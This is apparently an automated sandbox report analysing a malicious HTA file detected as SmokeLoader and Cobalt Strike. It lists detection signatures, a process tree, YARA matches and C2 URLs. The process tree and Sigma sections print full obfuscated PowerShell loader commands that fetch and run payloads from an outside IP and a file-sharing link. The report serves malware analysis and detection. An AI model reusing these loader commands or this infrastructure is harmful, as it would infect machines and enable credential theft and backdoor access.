Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
veryeasythingsevermadeforcreatenewthignsbetterthigns.hta

Overview

General Information

Sample name:veryeasythingsevermadeforcreatenewthignsbetterthigns.hta
Analysis ID:1539853
MD5:9f1733aa2737250f3e253416eece168d
SHA1:55f89ea7ec19fd9bad79d119e5e0d2bb5eb86a17
SHA256:63996411977b3f59cee9b839e79955227b66ef2cf7ddd9ee388ad4fdc5559045
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected SmokeLoader
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Found evasive API chain (may stop execution after checking mutex)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7744 cmdline: mshta.exe "C:\Users\user\Desktop\veryeasythingsevermadeforcreatenewthignsbetterthigns.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7848 cmdline: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 8152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 8168 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 1384 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 6128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • aspnet_regbrowsers.exe (PID: 1704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF)
            • aspnet_regbrowsers.exe (PID: 8012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: BB8B6B54FD50C08AB579B84BF07918CF)
              • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 2312 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 2796 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 4232 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                  • WerFault.exe (PID: 7352 cmdline: C:\Windows\system32\WerFault.exe -u -p 4232 -s 704 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
                • explorer.exe (PID: 3108 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 4072 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 6160 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 4576 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wihaduv (PID: 1556 cmdline: C:\Users\user\AppData\Roaming\wihaduv MD5: BB8B6B54FD50C08AB579B84BF07918CF)
    • conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
SourceRuleDescriptionAuthorStrings
00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 8 entries
        SourceRuleDescriptionAuthorStrings
        13.2.aspnet_regbrowsers.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi32_7848.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
            amsi32_6124.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhz
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativad
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = 